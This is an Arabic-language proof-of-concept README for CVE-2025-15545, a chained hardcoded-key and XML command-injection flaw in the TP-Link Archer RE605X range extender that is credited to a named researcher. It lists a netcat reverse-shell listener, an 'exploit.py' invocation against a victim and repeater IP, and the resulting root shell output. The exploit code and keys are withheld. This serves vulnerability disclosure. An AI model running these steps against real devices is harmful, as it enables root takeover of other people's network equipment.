
إثبات المفهوم لـ CVE-2025-15545
البائع: TP-Link
موقع البائع: TP-Link
الطراز: Archer RE605X
إصدار العتاد: RE605X v3.0
إصدار البرنامج الثابت: RE605X(EU)_V3_1.1.5 Build 20240905
عنوان تحميل البرنامج الثابت: TP-Link
سلسلة من الثغرات — بما في ذلك استخدام مفاتيح تشفير ثابتة وحقن أوامر في مكون محلل تكوين XML — تسمح لمهاجم محلي موثوق بتحقيق تنفيذ تعليمات برمجية عن بُعد (RCE) كجذر (root) على الجهاز.
ملاحظة: يُظهر الإثبات exploit.py سيناريو هجوم متسلسل ويعتمد على بيانات اعتماد من مستخدم موثوق كمتطلب إضافي. لا تغطي CVE-2025-15545 خطوة المصادقة هذه وهي مدرجة لأغراض العرض التوضيحي فقط.
استمع للاتصالات الواردة على طرفية منفصلة:
$ nc -lvnp 4444
نفذ البرنامج النصي exploit.py:
$ sudo python3 exploit.py <interface> <victim_ip> <repeater_ip> <aes_key> <aes_iv>
ملاحظة: aes_key وaes_iv هما مفتاحا التشفير الثابتان المستخدمان لتشفير وفك تشفير ملفات التهيئة بواسطة الجهاز، وهما مطلوبان لهذا الإثبات. لأسباب أمنية لا يمكن مشاركتهما هنا.
يتم استلام الصدفة العكسية على الطرفية الأولى:
$ nc -lvnp 4444
Connection from 192.168.0.254:42762
# ls
cgi-bin
index-notice.html
index-url.html
index.html
webpages
# id -un
root
# uname -n
OpenWrt
تم الإبلاغ عن هذه الثغرات بواسطة Nicola Giuffrida.